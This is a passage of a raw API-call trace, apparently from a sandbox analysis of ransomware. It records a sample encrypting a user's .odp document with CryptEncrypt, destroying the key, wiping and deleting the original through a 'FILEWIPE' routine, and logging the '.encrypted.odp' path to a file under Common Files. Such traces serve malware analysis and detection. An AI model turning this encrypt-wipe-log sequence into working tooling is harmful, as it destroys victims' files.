lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.090] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.091] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.091] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x88ffb0*, pdwDataLen=0x6ae220*=0x14cd6, dwBufLen=0x14ce0 | out: pbData=0x88ffb0*, pdwDataLen=0x6ae220*=0x14ce0) returned 1 [0036.093] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0036.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.093] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.093] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.093] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.094] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.101] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0036.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.101] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.101] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.101] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.101] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0036.101] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0036.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.102] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.102] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.102] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0036.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.102] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.102] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0036.102] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0036.102] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0036.102] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0036.102] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.102] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0036.102] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.103] FreeLibrary (hLibModule=0x754b0000) returned 1 [0036.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0036.103] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0036.106] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0036.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0036.106] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.107] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb8168a0, ftCreationTime.dwHighDateTime=0x1d5bd8c, ftLastAccessTime.dwLowDateTime=0xdad62e60, ftLastAccessTime.dwHighDateTime=0x1d5bce5, ftLastWriteTime.dwLowDateTime=0xdad62e60, ftLastWriteTime.dwHighDateTime=0x1d5bce5, nFileSizeHigh=0x0, nFileSizeLow=0x14cd6, dwReserved0=0x0, dwReserved1=0x777648, cFileName="8Yj2_lqSAK_Ho8rx.odp", cAlternateFileName="8YJ2_L~1.ODP")) returned 0x7c2100 [0036.107] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0036.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0036.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0036.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0036.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.107] CharLowerBuffW (in: lpsz="byte[85206]", cchLength=0xb | out: lpsz="byte[85206]") returned 0xb [0036.107] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0036.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.107] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.107] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0036.108] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0036.108] FreeLibrary (hLibModule=0x76b40000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0036.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0036.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0036.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.109] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0036.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0036.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.109] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0036.109] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.109] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\8yj2_lqsak_ho8rx.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0036.109] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0036.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0036.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0036.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0036.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0036.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0036.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0036.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0036.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0036.109] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0036.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0036.110] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0036.110] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0036.110] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.110] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.110] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.110] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0036.110] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.110] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.110] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.110] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp", lpFilePart=0x0) returned 0x4e [0036.111] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb8168a0, ftCreationTime.dwHighDateTime=0x1d5bd8c, ftLastAccessTime.dwLowDateTime=0xdad62e60, ftLastAccessTime.dwHighDateTime=0x1d5bce5, ftLastWriteTime.dwLowDateTime=0x153b93a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x14cd6, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="8Yj2_lqSAK_Ho8rx.odp", cAlternateFileName="8YJ2_L~1.ODP")) returned 0x7c2100 [0036.111] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\8yj2_lqsak_ho8rx.odp")) returned 1 [0036.112] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb8168a0, ftCreationTime.dwHighDateTime=0x1d5bd8c, ftLastAccessTime.dwLowDateTime=0xdad62e60, ftLastAccessTime.dwHighDateTime=0x1d5bce5, ftLastWriteTime.dwLowDateTime=0x153b93a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x14cd6, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="8Yj2_lqSAK_Ho8rx.odp", cAlternateFileName="8YJ2_L~1.ODP")) returned 0 [0036.112] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0036.112] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.113] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0036.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0036.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0036.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0036.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0036.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0036.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0036.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0036.113] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0036.113] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0036.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.113] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0036.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.113] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0036.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0036.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.113] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0036.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0036.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0036.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.114] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0036.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.114] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0036.114] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.114] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0036.114] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.114] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0036.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0036.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.114] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0036.114] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x1d0b, lpOverlapped=0x0) returned 1 [0036.114] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0036.114] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x1d0b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.115] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0036.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0036.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0036.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.encrypted.odp\r\n", cchWideChar=91, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 91 [0036.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5b) returned 0x87aa40 [0036.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.encrypted.odp\r\n", cchWideChar=91, lpMultiByteStr=0x87aa40, cbMultiByte=91, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\8Yj2_lqSAK_Ho8rx.encrypted.odp\r\n", lpUsedDefaultChar=0x0) returned 91 [0036.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0036.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0036.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0036.115] WriteFile (in: hFile=0x140, lpBuffer=0x87a9d8*, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87a9d8*, lpNumberOfBytesWritten=0x6aee3c*=0x5a, lpOverlapped=0x0) returned 1 [0036.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0036.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.115] CloseHandle (hObject=0x140) returned 1 [0036.116] 